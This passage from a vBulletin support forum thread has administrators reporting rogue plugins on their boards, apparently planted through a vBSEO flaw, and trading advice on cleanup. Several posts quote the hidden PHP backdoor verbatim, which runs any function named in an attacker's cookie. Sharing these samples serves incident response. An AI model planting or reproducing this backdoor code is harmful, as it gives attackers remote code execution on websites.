Is This a Default Plugin?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • deviataz
    New Member
    • Jul 2007
    • 26
    • 3.6.x

    #16
    Originally posted by Wayne Luke
    Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
    There is no log for the rogue plugins called "vBulletin Templates Cookie Caching" & "vBCMS Global Thread Cache". Not at any board I've checked that has those plugins at least. It simply exists at one point?

    Comment

    • Wayne Luke
      vBulletin Technical Support Lead
      • Aug 2000
      • 73979

      #17
      Originally posted by DelDrago
      This "vbCMS Global Thread Cache" has appeared on my site as well.

      Should I conclude that my site has been hacked?? If so, what measures should I take to clean up the damage? Please advise.
      Besides the plugin, what damage is there?

      However you should change all your passwords... Email, FTP, Admin CP, vBSEO, etc... Especially if you shared passwords among accounts or used any password shorter than 12 characters.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API

      Comment

      • Talaturen
        New Member
        • Dec 2005
        • 12
        • 3.8.x

        #18
        Originally posted by Wayne Luke
        Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.
        I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).

        Comment

        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 73979

          #19
          Originally posted by Talaturen
          I can't see the plugin id of added plugins, so I can't know if it was added by any of the admin users. It should also be noted that the latest vBSEO patch does not help against this as 3.6.0 has had that patch all the time already (see: https://www.vbulletin.com/forum/show...=1#post2257525).
          vBSEO's release announcement suggests otherwise though. http://www.vbseo.com/f5/vbseo-securi...release-52783/

          I'd say we're all working to make the software as secure as possible. Eliminating any potential vector acheives that.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

          Comment

          • Archaic
            Senior Member
            • Dec 2002
            • 145
            • 3.8.x

            #20
            vBSEO's release announcement is incorrect then, because I've had another plugin added to the same spot even after making their update.

            I just made a post about it on their forums, which I've quoted below for convenience.

            Not sure if it might be related to this issue or not, but when I went and did a file diagnostics on my forum, it found that the file md5_sums_crawlability_vbseo.php was missing. Seeing as I installed vBSEO for the first time with the current version, I find it unlikely I would've missed uploading it when I installed the package.

            EDIT:
            It looks like the plugin is back and worse than before. Just went into my plugin manager to check, and found this under global_complete.

            vBulletin Templates Cookie Caching
            Code:
            /* vBulletin Templates Cookie Caching */
            $vbr="ofkqjhri";$vbh="158b2179e61097612d74754bbc1e8c7a";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
            EDIT 2:
            Okay, just went to my admin log and checked. The plugin being added is clearly showed there, however it's being shown as added by me and with the IP I am currently using.

            Here's the kicker though. At pretty much the exact time this plugin was added, I'd made the vBSEO config file writable so that I could change some settings. The timing seems too much to be of a coincidence.
            神出鬼没 - shin shutsu ki botsu

            Webmaster, Bulbagarden / Bulbapedia

            Comment

            • Zachery
              Former vBulletin Support
              • Jul 2002
              • 59097

              #21
              If they've done something else after already gaining access, they could be sneaking the plugin back in in a large number of ways.

              Comment

              • galerio
                Member
                • Jan 2011
                • 60

                #22
                This is a VBSEO security issue: as soon as you log into VBSEO control panel, the plugin appears!!!!
                This is now confirmed by all other vbseo members

                Comment

                • baghdad4ever
                  Senior Member
                  • Apr 2007
                  • 587
                  • 4.1.x

                  #23
                  Originally posted by galerio
                  This is a VBSEO security issue: as soon as you log into VBSEO control panel, the plugin appears!!!!
                  This is now confirmed by all other vbseo members
                  yes

                  you are right

                  Comment

                  • alaska_av8r
                    Senior Member
                    • Dec 2009
                    • 181
                    • 3.8.x

                    #24
                    Okay I have this plugin that I didn't install:

                    vBulletin Templates Cookie Caching

                    here is the code:
                    Code:
                    /* vBulletin Templates Cookie Caching */
                    $vbr="hgfzshne";$vbh="49cfac7025dfd5d00dc5a080c4a5c637";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
                    Is this an exploit and what do I need to do?

                    Comment

                    • Archaic
                      Senior Member
                      • Dec 2002
                      • 145
                      • 3.8.x

                      #25
                      Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.
                      神出鬼没 - shin shutsu ki botsu

                      Webmaster, Bulbagarden / Bulbapedia

                      Comment

                      • Adam H
                        Senior Member
                        • Apr 2008
                        • 139
                        • 4.1.x

                        #26
                        Confirmed another name for it

                        Code:
                         /* vBulletin Dynamic Menu Filters */
                        (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
                        Found on a 4.1.8 install with VBSEO 3.6.
                        The opinions expressed in forum posts are my own personal opinions and do not represent any companies that i am associated with.

                        Comment

                        • Archaic
                          Senior Member
                          • Dec 2002
                          • 145
                          • 3.8.x

                          #27
                          Same location as the previous ones?
                          神出鬼没 - shin shutsu ki botsu

                          Webmaster, Bulbagarden / Bulbapedia

                          Comment

                          • Adam H
                            Senior Member
                            • Apr 2008
                            • 139
                            • 4.1.x

                            #28
                            Originally posted by Archaic
                            Same location as the previous ones?
                            Yes same location, Ive checked 21 clients sites so far, 2 of them have been affected and also a test site that was only setup last week has been affected. So far ive found nothing else apart from the plugin but i am disabling VBSEO as precaution .
                            The opinions expressed in forum posts are my own personal opinions and do not represent any companies that i am associated with.

                            Comment

                            • Talaturen
                              New Member
                              • Dec 2005
                              • 12
                              • 3.8.x

                              #29
                              See: http://www.vbseo.com/f5/vbseo-securi...tml#post325689

                              Comment

                              • alaska_av8r
                                Senior Member
                                • Dec 2009
                                • 181
                                • 3.8.x

                                #30
                                Originally posted by Archaic
                                Delete the plugin. Make sure you don't even visit your vBSEO control panel until vBSEO come out with a fix. Report back if any rogue plugins appear again despite you not visiting that control panel.
                                Will do!

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...